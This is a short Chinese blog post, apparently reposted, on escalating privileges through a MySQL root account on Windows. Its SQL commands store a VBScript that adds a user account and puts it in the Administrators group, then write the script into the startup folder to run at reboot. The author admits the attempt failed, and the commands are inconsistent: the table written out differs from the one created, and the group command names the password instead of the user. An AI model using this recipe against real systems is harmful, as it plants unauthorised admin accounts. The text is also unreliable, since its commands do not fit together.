文章来源:
http://www.jb51.net/hack/32280.html
命令操作如下:
mysql> create table a (cmd text);
Query OK, 0 rows affected
mysql> insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
Query OK, 1 row affected
mysql> insert into a values ("a=wshshell.run (""cmd.exe /c net user coffee y2k10516 /add"",0) " );
Query OK, 1 row affected
mysql> insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators y2k10516 /add"",0) " );
Query OK, 1 row affected
1.使用命令后效果
mysql> select * from a ;
+------------------------------------------------------------------------------+
| cmd |
+------------------------------------------------------------------------------+
| set wshshell=createobject ("wscript.shell" ) |
| a=wshshell.run ("cmd.exe /c net user coffee y2k10516 /add",0) |
| b=wshshell.run ("cmd.exe /c net localgroup Administrators y2k10516 /add",0) |
+------------------------------------------------------------------------------+
3 rows in set
打入启动项:
1. select * from libc into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\libc.vbs";
等系统重启就有新用户了/
我没有实现提权,虽然是用的root用户,但是可能数据库有设置,没法执行写文件权限。有的root 因为是默认的空密码,所以没法远程执行有的sql命令;
提权是一个技术活,我早晚会搞定这个技术的!
本文出自 “丑小鸭的天空” 博客,谢绝转载!